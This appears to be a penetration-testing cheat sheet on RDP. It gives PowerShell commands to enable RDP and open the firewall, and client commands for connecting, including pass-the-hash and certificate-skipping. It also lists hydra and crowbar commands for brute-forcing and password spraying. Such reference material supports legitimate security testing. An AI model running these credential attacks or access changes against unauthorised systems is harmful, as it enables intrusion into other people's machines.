PRIMARY CATEGORY → PROTOCOLS AND SERVICES
RDP → Remote Desktop Protocol
Ports
3389
Enabling RDP
Editing Windows Registry Values
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server"-Name "fDenyTSConnections" -Value 0Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services\Client" -Name "fClientDisableUDP" -Value 0Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1Allowing Inbound RDP Connections
TCP
New-NetFirewallRule -DisplayName "RDP (TCP)" -Direction Inbound -Action Allow -Protocol TCP -LocalPort 3389 -RemoteAddress $RemoteAddress -Profile Any -Enabled True | Out-NullUDP
New-NetFirewallRule -DisplayName "RDP (UDP)" -Direction Inbound -Action Allow -Protocol UDP -LocalPort 3389 -RemoteAddress $RemoteAddress -Profile Any -Enabled True | Out-NullRemote Connection
XFreeRDP
Password Auth
xfreerdp /u:<DOMAIN>\<USER> /p:<PASSWORD> /v:<TARGET>:<PORT>Pass The Hash
xfreerdp /u:<DOMAIN>\<USER> /pth:<NTHASH> /v:<TARGET>:<PORT>Due to certain account restrictions applied to the remote machine, an attacker may have to enable the following policy →
Skip Certificate Validation
xfreerdp /u:<USER> /p:<PASSWORD> /v:<TARGET>:<PORT> /cert:ignoreRemmina
CLI
remmina -c rdp://<USER>:<PASSWORD>@<TARGET>:<PORT>RDesktop
rdesktop -u <USER> <TARGET>
rdesktop -d <DOMAIN> -u <USER> -p <PASSWORWD> <TARGET>Bruteforcing || Password Spraying
Crowbar
Bruteforcing
- User ↔ Passwordlist
crowbar -b rdp -s <TARGET[s]> -u <USERNAME> -C <PASSWDLIST>- **Userlist ↔ Passwordlist
crowbar -b rdp -s <TARGET[s]> -U <USERLIST> -C <PASSWDLIST>Password Spraying
crowbar -b rdp -s <TARGET[s]> -U <USERLIST> -c '<PASSWORD>'Hydra
Bruteforcing
- User ↔ Passwordlist
hydra -T <THREADS> -l <USERNAME> -P <PASSWDLIST> rdp://<TARGET>- Userlist ↔ Passwordlist
hydra -T <THREADS> -L <USERLIST> -P <PASSWDLIST> rdp://<TARGET>Password Spraying
hydra -T <THREADS> -L <USERLIST> -p '<PASSWORD>' rdp://<TARGET>